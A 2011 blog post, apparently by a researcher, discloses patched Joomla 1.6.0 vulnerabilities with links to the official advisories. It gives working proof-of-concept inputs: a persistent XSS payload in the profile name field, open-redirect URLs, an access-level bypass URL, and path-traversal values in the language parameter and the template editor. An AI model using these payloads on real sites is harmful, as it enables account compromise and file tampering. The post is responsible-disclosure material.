Tuesday, 08 March 2011 10:47

Now that 1.6.1 is officially released, I figured I'd go ahead and publish a few of the "sensitive" bugs I found in 1.6.0.

So without further ado...

Persistent XSS

http://developer.joomla.org/security/news/331-20110204-core-xss-vulnerabilities
  1. Log in as any user
  2. Edit profile
  3. Change name:
y"/style="position:absolute;top:0px;left:0px;width:99em;height:99em"/onmouseover="alert(1);//
  1. Save profile
  2. Wait for admin to visit administrator/index.php?option=com_users

Redirect

http://developer.joomla.org/security/news/333-20110302-core-redirect-vulnerabilities

The following URLs caused off-site redirects.

index.php?option=com_content&view=article&task=vote&id=-1&user_rating=999&url=http%3A%2f%2fjeffchannell.com

index.php?option=com_weblinks&task=weblink.add&return=aHR0cDovL2plZmZjaGFubmVsbC5jb20=

Information Disclosure

http://developer.joomla.org/security/news/334-20110303-core-information-disclosure

The following url could be used to see articles regardless of user access level:

index.php?option=com_content&view=articles&layout=modal&tmpl=component

Information Disclosure

http://developer.joomla.org/security/news/332-20110301-core-information-disclosure

saving of user profiles did not properly sanitize the 'language' parameter

  1. Log in as any user
  2. visit index.php?option=com_users&view=profile
  3. click "Edit Profile"
  4. turn on Tamper Data
  5. submit form
  6. edit jform[params][language] and set to ../index.php%00
  7. submit data
* Failed loading XML file
* /var/www/jj/language/../index.php
* XML: ParsePI: PI php never end ...
* XML: Start tag expected, '<' not found

Unauthorized Access

http://developer.joomla.org/security/news/335-20110304-core-unauthorised-access

The following URL will allow authenticated users with permission to access the Template Manager to edit files outside the scope of the template:

administrator/index.php?option=com_templates&task=source.edit&id=NTAzOi4uLy4uL2luZGV4LnBocA==
Last Updated on Tuesday, 08 March 2011 11:21
 
Comments (1)
1 Monday, 08 August 2011 21:25
minixssx
Wonderful work!!

so brilliant you are

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions